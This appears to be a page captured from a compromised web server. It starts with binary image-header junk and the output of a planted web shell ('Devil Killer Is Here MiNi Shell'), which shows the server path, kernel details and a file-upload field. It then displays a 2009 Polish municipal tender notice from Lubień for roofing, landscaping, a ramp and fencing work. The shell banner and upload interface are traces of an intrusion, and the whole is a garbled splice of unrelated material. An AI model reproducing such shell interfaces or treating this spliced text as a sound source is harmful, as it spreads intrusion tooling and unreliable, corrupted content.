JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090223/41305-N-2009.html

<p class="kh_header"><b>Lubień: Roboty budowlane obejmujące :
I. Wymianę pokrycia z blachy dachu na budynku Ośrodka Zdrowia w Lubniu;
II. Zagospodarowanie terenu koło Ośrodka Zdrowia w Lubniu;
III. Pochylnia i schody zewnętrzne przy Ośrodku Zdrowia;
IV. Obiekty małej architektury i ogrodzenie terenu przy budynku nr 515 w Lubniu;
realizowane w ramach projektu MRPO.06.02.01-12-190/08 Zagospodarowanie przestrzeni publicznej i odnowa centrum wsi Lubień</b><br>
<b>Numer ogłoszenia: 41305 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Lubień , Lubień 50/22, 32-433 Lubień, woj. małopolskie, tel. 018 2682017 w. 122, faks 018 2682035.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubien.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane obejmujące :
I. Wymianę pokrycia z blachy dachu na budynku Ośrodka Zdrowia w Lubniu;
II. Zagospodarowanie terenu koło Ośrodka Zdrowia w Lubniu;
III. Pochylnia i schody zewnętrzne przy Ośrodku Zdrowia;
IV. Obiekty małej architektury i ogrodzenie terenu przy budynku nr 515 w Lubniu;
realizowane w ramach projektu MRPO.06.02.01-12-190/08 Zagospodarowanie przestrzeni publicznej i odnowa centrum wsi Lubień.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : 
I. Wymiana pokrycia z blachy dachu na budynku Ośrodka Zdrowia w Lubniu :
1.	Wymiana pokryć dachowych i obróbek z deskowaniem i łaceniem z blachy trapezowej na łatach na blachę trapezowa powlekaną- 776,01m2,
2.	Izolacja z folii polietylenowej przymocowanej do konstrukcji drewnianej- 776,01m2,
3.	Łacenie połaci dachowych- kontr łaty- 693,01 m2,
4.	Wymiana odcinków pionowych rur spustowych okrągłych z blachy, o średnicy110mm, na rury z tworzyw sztucznych - 30m;
5.	Wymiana rynien z blachy na rynny półokrągłe z tworzyw sztucznych o średnicy 150mm z zastosowaniem łączników z zaciskami 30,3+15,18 *2 = 90,96 m,
6.	Deska czołowa okapu do mocowania uchwytów rynien - 90,96 m;
7.	Uzupełnienie brakujących obróbek, nóżek, podpórek do ław kominiarskich, stojaków, linek itp.- 28,00 szt.;
8.	Ławy kominiarskie  - 19,00 m;
9.	Właz dachowy fabrycznie wykończony - 0,60*0,80*2=  0,96 m2,
10.	Przemurowanie kominów z cegieł o objętości w jednym miejscu ponad 0,5m3  5*2,0*0,4+3,8*2,2*0,4 =7,34m3,
11.	Nakrywy attyk ścian ogniowych i kominów o średniej grubości 7cm 5*2,0+2,2 *0,55 = 6,71m2,
CPV- 45.26.00.00-7 Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne  roboty .
II. Zagospodarowanie terenu koło Ośrodka Zdrowia w Lubniu :
Drogi wewnętrzne
1.	Rowki w gruncie kategorii III-IV o wymiarach 30x30cm pod krawężniki i ławy krawężnikowe- 243,95m;
2.	Ława betonowa zwykła pod krawężniki  243,95*0,30*0,30 - 21,96m3,
3.	Krawężniki betonowe o wymiarach 20x30cm wystające na podsypce cementowo-piaskowej- 243,95 m;
4.	Koryta o głębokości 20 cm wykonywane mechanicznie na całej szerokości jezdni i chodników w gruncie kategorii I-IV- 344,00 m2;
5.	Koryta o głębokości 20 cm wykonywane mechanicznie na całej szerokości jezdni i chodników w gruncie kategorii I-IV - za każde dalsze 5 cm- 344,00 m2;
6.	Warstwa odsączająca o grubości po zagęszczeniu 10cm w korycie i na poszerzeniach zagęszczana ręcznie- 344,00 m2;
7.	Warstwa dolna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 20cm- 344,00 m2,
8.	Warstwa górna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 8cm- 344,00 m2;
9.	Nawierzchnia z mieszanek asfaltu lanego z warstwą wiążąca z mieszanki grysowej o grubości 2cm- 344,00 m2,
10.	Nawierzchnia z mieszanek asfaltu lanego z warstwą wiążąca z mieszanki grysowej o grubości 2cm - za każdy dalszy 1cm- 344,00m2;
11.	Nawierzchnia z mieszanek asfaltu lanego z warstwą ścieralną z mieszanki grysowej o grubości 2cm- 344,00 m2;
Droga do remontu:
1.	Warstwa górna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 8cm- 204,00 m2;
2.	Nawierzchnia z mieszanek asfaltu lanego z warstwą wiążąca z mieszanki grysowej o grubości 2cm- 204,00 m2;
3.	Nawierzchnia z mieszanek asfaltu lanego z warstwą wiążąca z mieszanki grysowej o grubości 2cm - za każdy dalszy 1cm - 204,00 m2;
4.	Nawierzchnia z mieszanek asfaltu lanego z warstwą ścieralną z mieszanki grysowej o grubości 2cm- 204,00 m2;
Chodniki
1.	Koryta o głębokości 20 cm wykonywane mechanicznie na całej szerokości jezdni i chodników w gruncie kategorii I-IV- 264,00 m2;
2.	Warstwa odsączająca o grubości po zagęszczeniu 10cm w korycie i na poszerzeniach zagęszczana ręcznie -264,00 m2;
3.	Warstwa dolna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 20cm za każdy dalszy 1 cm- 264,00 m2;
4.	Warstwa górna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 8 cm - 264,00 m2;
5.	Chodniki z kostki brukowej betonowej o grubości 6cm na podsypce piaskowej- 264,00 m2;
6.	Rowki w gruncie kategorii III-IV o wymiarach 20x20cm pod obrzeża -113,50 m;
7.	Obrzeża betonowe o wymiarach 30x8cm na podsypce piaskowej, z wypełnieniem spoin zaprawą cementową- 113,50 m;
Urządzenie zieleni :
1.	Wykonanie trawników parkowych siewem na terenie płaskim w gruncie kategorii IV, przy uprawie mechanicznej z nawożeniem-ha 0,02;
2.	Przygotowanie terenu pod obsadzenia kwiatowe w gruncie kategorii IV, z wymianą gleby rodzimej warstwą ziemi 25cm- 105,00 m2;
3.	Sadzenie drzew i krzewów liściastych form naturalnych na terenie płaskim w gruncie kategorii IV o średnicy i głębokości dołów 0,5m z całkowitą zaprawą dołów - 25,00 szt.;
4.	Sadzenie drzew i krzewów liściastych form naturalnych na terenie płaskim w gruncie kategorii IV o średnicy i głębokości dołów 1,0-0,7m z całkowitą zaprawą dołów -szt. 16,00;
5.	Dowóz ziemi wykonywane koparkami podsiębiernymi z transportem urobku samochodami samowyładowczymi na odległość do 1km, lecz z ziemi uprzednio zmagazynowanej w hałdach -koparki o pojemność łyżki 0,25m3, grunt kategorii IV- 15,00m3;
6.	Nakłady uzupełniające do tablic 0201-0213 za każde dalsze rozpoczęte 0,5 km odległości transportu ponad 1 km samochodami samowyładowczymi na odległość ponad 1 km po drogach utwardzonych , grunt kategorii III-IV - 15 m3;

Ogrodzenie :
1.	Wykopy oraz przekopy wykonywane koparkami podsiębiernymi na odkład - pojemność łyżki 0,15 m3, grunt kategorii IV- 9,06 m3;
2.	Cokoły betonowe 0,20x0,30m z fundamentem 0,20x0,80m- 56,63m;
3.	Ogrodzenia na gotowych cokołach, na słupkach betonowych 30x30cm o wysokości nad cokołem do 1,3m- 23,00 szt.;
4.	Przygotowanie i montaż zbrojenia ze stali gładkiej w słupach ogrodzeniowych - 0,50 t;
5.	Osadzenie przęseł z płaskowników w ramach z kształtowników- 73,62 m2;
6.	Ogrodzenie z siatki o wysokości 1,5m na słupkach osadzonych w gruncie o rozstawie 2,1m z rur stalowych o średnicy 70mm- 21,30 m;
7.	Okładziny słupów z płyt prostokątnych z piaskowca i wapienia miękkiego o grubości do 2cm - 31,28 m2;
8.	Okładziny ścian i pilastrów z płyt prostokątnych z piaskowca i wapienia miękkiego o stosunku długości obwodu elementów do powierzchni do 8m/m2 i grubości do 2cm - 62,32 m2;
9.	Typowe wrota o szerokości 3m na gotowych słupkach z furtkami o szerokości 1m z siatki w ramach z kątowników, z pasem dolnym z blachy wysokości 25 cm, o wysokości 1,6m -kpl.- 2,00;
10.	Brama przesuwna  kpl.- 1,00;
Wyposażenie:
1.	Ławki parkowe z prefabrykatów żelbetowych z obudową drewnianą siedzeniową- 20,00  m2;
2.	Stojaki na rowery- szt. 5,00;
3.	Kosze na śmieci- szt. 7,00;
Ocieplenia cokołu :
1.	Izolacje z płyt styrodurowych  pionowe na kleju z podwójną siatką z tworzyw sztucznych -90,93 m2;
2.	Okładziny ścian i pilastrów z płyt prostokątnych z piaskowca i wapienia miękkiego o stosunku długości obwodu elementów do powierzchni do 8m na m2 i grubości do 4cm - 90,93 m2;
III. Pochylnia i schody do Ośrodka Zdrowia w Lubniu :
1.	Wykopy oraz przekopy wykonywane koparkami podsiębiernymi na odkład - pojemność łyżki 0,15m3, grunt kategorii III 1,2* 3,15+3,5 *2*1,26 = 20,11m3,
2.	Zasypywanie wykopów liniowych o ścianach pionowych o szerokości 0,8-1,5m i głębokości do 1,5m w gruncie kategorii III-IV = 20,11m3,
3.	Zagęszczenie ubijakami mechanicznymi, grunt sypki kategorii I-III = 20,11 m3,
4.	Podkłady betonowe na podłożu gruntowym 0,06* 3,15+3,0 *2*0,4 = 0,30 m3,
5.	Ławy fundamentowe żelbetowe prostokątne o szerokości do 0,6m z ręcznym układaniem betonu  3,15+2,8 *2*0,3*0,3 = 1,07 m3,
6.	Ściany żelbetowe grubości 12cm z ręcznym układaniem betonu o wysokości do 6,0m  3,15+2,8*2*2,23+1,03*0,5 = 19,40m2,
7.	Ściany żelbetowe grubości 12cm z ręcznym układaniem betonu o wysokości do 6,0m 3,15+2,8*2*2,23+1,03*0,5 = 19,40m2,
8.	Schody żelbetowe proste na płycie grubości 8cm z ręcznym układaniem betonu 3,15*3,0 =9,45m2,
9.	Schody żelbetowe z ręcznym układaniem betonu - dodatek za każdy 1cm różnicy grubości płyty schodowej Krotność = 7= 9,45m2,
10.	Przygotowanie i montaż zbrojenia ze stali żebrowanej w elementach budynków i budowli t 0,51
11.	Przygotowanie i montaż zbrojenia ze stali gładkiej w elementach budynków i budowli t 0,01
12.	Izolacje przeciw wilgociwe powłokowe pionowe wykonywane dysperbitem - pierwsza warstwa 0,5+1,3*2*3,15+3,0*2= 38,13m2,
13.	Izolacje przeciw wilgociwe powłokowe pionowe wykonywane dysperbitem - każda następna warstwa ponad pierwszą m2 38,13m2,
Schody zewnętrzne główne - roboty wykończeniowe:
14.	Ręczne gruntowanie EUROLANEM 3K powierzchni poziomych pod uszczelnienia w technologii SUPERFLEX-10 3,25*3,1+1,35*3,25 =14,46 m2,
15.	Uszczelnienie masą SUPERFLEX-10 powierzchni poziomych poddanych działaniu wody działającej bez ciśnienia = 14,46 m2,
16.	Okładzina schodów z płytek terakotowych GRES 30x30cm układanych na gotowym i wyrównanym podłożu przy zastosowaniu masy klejącej14,46 = 14,46 m2,
17.	Ręczne gruntowanie EUROLANEM 3K powierzchni poziomych betonowych i otynkowanych pod uszczelnienia w technologii SUPERFLEX-10= 7,28 m2,
18.	Licowanie ścian płytkami na klej płytki o wym.20x20cm 3,25*2+1,55*0,5 =2 7,28 m2,
19.	Balustrady tarasowe z pochwytem stalowym 3,25*2 = 6,50 m ;
Pochylnia -stan surowy
1.	Wykopy oraz przekopy wykonywane koparkami podsiębiernymi na odkład - pojemność łyżki 0,15m3, grunt kategorii III  1+1,75 *7,90*1,26 = 27,37 m3 ; 1,0+3,05 * 1,65+1,0 *1,26 = 13,52 m3  9,50+1,0 *2*1,26+ 1,36+1,0*3*1,26 = 35,38 m3 razem = 76,27 m3;
2.	Zasypywanie wykopów liniowych o ścianach pionowych o szerokości 0,8-1,5m i głębokości do 1,5m w gruncie kategorii III-IV= 76,27m3;
3.	Zagęszczenie ubijakami mechanicznymi, grunt sypki kategorii I-III = 76,27m3;
4.	Podkłady betonowe na podłożu gruntowym 0,06*7,9*1,75+3,05*1,65+9,5*2*0,4+1,36*3*0,4 = 1,69m3;
5.	Płyty fundamentowe żelbetowe z ręcznym układaniem betonu 7,90*1,75+3,05*1,65 = 18,86 m3;
6.	Ławy fundamentowe żelbetowe prostokątne o szerokości do 0,6m z ręcznym układaniem betonu
7.	9,5*2+1,36*3*0,3*0,3 = 2,08m3;
8.	 Ściany żelbetowe grubości 12cm z ręcznym układaniem betonu o wysokości do 6,0m 9,5*4+7,9+3,05*5*1,67 = 102,12 m3;
9.	Ściany żelbetowe z ręcznym układaniem betonu - dodatek za każdy 1cm różnicy grubości Krotność = 8=102,12 m2,
10.	Płyty żelbetowe stropowe, płaskie lub na żebrach, grubości 8cm z ręcznym układaniem betonu 9,50*3,05+1,4*7,9+3,05*1,65 = 45,07 m2;
11.	Izolacje przeciwwilgociwe powłokowe pionowe wykonywane dysperbitem - pierwsza warstwa
7,6*6*1,65+1,2*6+2,65*4+1,2*4*1,65 m2 112,53 9,5*2+3,0682+1,40*1,40 m2 32,86 razem = 145,39 m2;
12.	Izolacje przeciwwilgociwe powłokowe pionowe wykonywane dysperbitem - każda następna warstwa ponad pierwszą= 145,39 m2;
Pochylnia -roboty wykończeniowe
13.	Ręczne gruntowanie EUROLANEM 3K powierzchni poziomych pod uszczelnienia w technologii SUPERFLEX-10 9,5*3,16+1,5*8,0+3,16*1,75 = 47,55 m2;
14.	Uszczelnienie masą SUPERFLEX-10 powierzchni poziomych poddanych działaniu wody działającej bez ciśnienia = 47,55 m2;
15.	Okładzina pochylni z płytek terakotowych GRES 30x30cm układanych na gotowym i wyrównanym podłożu przy zastosowaniu masy klejącej =47,55 m2;
16.	Ręczne gruntowanie EUROLANEM 3K powierzchni poziomych betonowych i otynkowanych pod uszczelnienia w technologii SUPERFLEX-10 9,50*2+3,06*3*0,87+0,52*8*6*0,5 = 37,00 m2;
17.	Licowanie ścian płytkami na klej płytki o wym.20x20cm= 37,00 m2 ;
CPV - 45.26.25.12-3 Kamieniarskie roboty wykończeniowe,
CPV - 45.26.26.50-2 Roboty w zakresie okładania .
CPV- 45.10.00.00-7 Roboty budowlane ,CPV-45.10.00.00-8 Przygotowanie terenu pod budowę.
IV. Obiekty małej architektury i ogrodzenie terenu przy budynku nr 515 w Lubniu;
Roboty rozbiórkowe:
1.	Rozebranie murów i słupów z cegły w budynkach o wysokości do 9,0m (do 2 kondygnacji) na zaprawie cementowo-wapiennej powyżej poziomu terenu- 40,00 m3;
2.	Rozebranie płyt dachowych żelbetowych przy grubości płyt do 15cm- 25 m3;
3.	Rozebranie podłoża z betonu żwirowego o grubości ponad 15cm-20m3;
4.	Rozebranie ścian betonowych o grubości do 20cm -4 m3;
5.	Rozbiórka ogrodzenia z siatki o wysokości 1,5m na słupkach o rozstawie 2,1m z rur stalowych o średnicy 70mm 19,2+61,88+9,52+11,9+7,14+3,6+13,06+47,76+13,7+24,12 - 211,88 m;
6.	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego 40+25+20+4+211,88*0,1 -110,19 m3;
7.	Transport gruzu z terenu rozbiórki samochodem ciężarowym na odległość 1km mechanicznie ładowanego i wyładowanego - nakłady uzupełniające na każdy dalszy rozpoczęty km ponad 1km odległości- 110,19 m3;
Ogrodzenie :
1.	Cokoły betonowe 0,20 x0,30m z fundamentem 0,20x0,80m 211,88+11,9+21,42+11,90=257,10 m;
2.	Ogrodzenia na gotowych cokołach, z siatki w ramach, na słupkach kamiennych 50x50cm o wysokości nad cokołem do 1,5m - 88 szt.;
3.	Osadzenie przęseł z siatki w ramach z kształtowników 88*1,50*2,28  = 300,96 m2;
4.	Okładziny ścian i pilastrów z płyt prostokątnych z piaskowca i wapienia miękkiego 0,2*2+0,3*257,10 = 179,97 m2 ;
5.	Ogrodzenie z siatki o wysokości 1,5m na słupkach o rozstawie 2,1m z rur stalowych o średnicy 70mm 11,74+7,05 = 18,79 m;
6.	Typowe wrota z furtkami o szerokości 3,0m w ramach stalowych na gotowych słupkach z siatki w ramach z kątowników, z pasem dolnym z blachy wysokości 25 cm, o wysokości 1,5m -1,00 kpl;
7.	Typowe wrota z furtkami o szerokości 2,5,0m w ramach stalowych na gotowych słupkach z siatki w ramach z kątowników, z pasem dolnym z blachy wysokości 25 cm, o wysokości 1,5m-3 kpl.;
8.	Pokrycie słupków dachówką holenderką tzw. esówką SEEGER 88*0,6*0,6 = 31,68 m2;
Ścieżki spacerowe i renowacja dróg i placów:
1.	Koryta o głębokości 20 cm wykonywane mechanicznie na całej szerokości jezdni i chodników w gruncie kategorii I-IV 62+10,5+6,0+21,4  *2,5 = 249,75 m2, 9,0+17,5 *4,5 = 119,25 m2 razem  369,00 m2;
2.	Koryta o głębokości 20 cm wykonywane mechanicznie na całej szerokości jezdni i chodników w gruncie kategorii I-IV - za każde dalsze 5 cm =369 m2;
3.	Warstwa dolna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 20cm =369 m2;
4.	Warstwa górna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 8cm = 369 m2;
5.	Nawierzchnie z kostki brukowej betonowej grubości 6cm, układane na podsypce piaskowej= 369 m2;
6.	Rowki w gruncie kategorii III-IV o wymiarach 20x20cm pod krawężniki i ławy krawężnikowe 62+10,5+60+21,4+9,0+17,5 2 = 360,80 m;
7.	Obrzeża betonowe o wymiarach 20x6cm na podsypce piaskowej, z wypełnieniem spoin piaskiem =360,80 m;
8.	Rowki w gruncie kategorii III-IV o wymiarach 30x30cm pod krawężniki i ławy krawężnikowe 13,5+6,5+18,2+6,6+24,12+7,5+21,4+18,2  = 116,02 m;
9.	Krawężniki betonowe o wymiarach 20x30cm wystające na podsypce cementowo-piaskowej =116,02 m;
10.	Warstwa górna podbudowy z kruszywa naturalnego o grubości po zagęszczeniu 8cm uzupełnienie 13,5*14+42,2*3 = 315,60 m2 ;
11.	Nawierzchnia z mieszanek asfaltu lanego z warstwą wiążąca z mieszanki grysowej o grubości 6cm=315,60 m2;
Urządzenie zieleni :
1.	Roboty ziemne wykonywane koparkami podsiębiernymi z transportem urobku samochodami samowyładowczymi na odległość do 1,5 km, lecz z ziemi uprzednio zmagazynowanej w hałdach - koparki o pojemność łyżki 0,25m3, grunt kategorii IV 0,5*1950*0,1= 97,50 m3;
2.	Plantowanie ręczne powierzchni gruntu rodzimego kategorii IV -1950 m2;
3.	Ręczny wysiew nawozów mineralnych lub wapna nawozowego na terenie płaskim-0,195 ha,
4.	Ręczne wykonanie trawników dywanowych siewem bez nawożenia w gruncie kategorii IV-1950 m2;
5.	Ręczne wykonanie trawników dywanowych siewem bez nawożenia w gruncie kategorii IV -197,00 szt.;
6.	Sadzenie drzew liściastych form piennych na terenie płaskim w gruncie kategorii III o średnicy i głębokości dołów 0,7m z całkowitą zaprawą dołów-40 szt.;
7.	Sadzenie krzewów liściastych form piennych na terenie płaskim w gruncie kategorii III o średnicy i głębokości dołów 0,5m z całkowitą zaprawą dołów -24 szt.;
8.	Obsadzenie kwietników roślinami kwietnikowymi 9szt na m2 -52 m2;
Mała architektura:
1.	Ławki parkowe z prefabrykatów żelbetowych z obudową drewnianą siedzeniową 23*2 = 46,00m;
2.	Osadzenie stołu ping-ponga -4 kpl;
3.	Prostokątne ściany piaskownic z betonu żwirowego 1,5 m3;
4.	Osadzenie karuzeli - analogia-1 szt.;
5.	Osadzenie huśtawek -4 szt.;
6.	Osadzenie przeplotni -1 szt.;
7.	Osadzenie koszy -9 szt.
CPV- 45.11.00.00.-1 Roboty w zakresie rozbiórki obiektów budowlanych, roboty ziemne;
CPV- 45.11.10.00-8 Roboty w zakresie burzenia, roboty ziemne ,
CPV- 45.11.12.20-6 Roboty w zakresie usuwania gruzu. 
CPV- 45.10.00.00-7 Roboty budowlane ,CPV-45.10.00.00-8 Przygotowanie terenu pod budowę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-7, 45.26.00.00-7, 45.10.00.00-8, 45.26.25.12-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości  1000,00 zł przed upływem terminu składania ofert .Wadium może być wnoszone w jednej lub kilku następujących formach:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze pieniężnym ;
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych .
-	wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek Zamawiającego w Banku Spółdzielczym w Mszanie Dolnej nr 24 88080006 0030 0300 1515 0020 . 
-	Za termin złożenia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.	Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania warunków .
O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki określone w art.22 ust.1 i nie podlegają wykluczeniu z postępowania na podstawie art.24 Prawa Zamówień Publicznych. Spełnienie tego warunku będzie oceniane na podstawie oświadczenia stanowiącego zał. Nr 3 do SIWZ i dokumentów wymienionych w pkt.6.
5.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki:
1)	posiadają uprawnienia do wykonania określonej działalności lub czynności , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia ;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia ; 
4)	nie podlega wykluczeniu z postępowania o udzielenie zamówienia ;
5)	wniosą wadium spełniające wymagania niniejszej siwz;
5.2.Z postępowania o udzielenie zamówienia wyklucza się :
1)	wykonawców , którzy wyrządzili szkodę , nie wykonując zamówienia lub wykonując je nienależycie , jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania ;
2)	 wykonawców w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego ;
3)	 wykonawców, którzy zalegają z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne ,z wyjątkiem przypadków, gdy  uzyskali oni przewidziane prawem zwolnienie ,odroczenie ,rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu ;
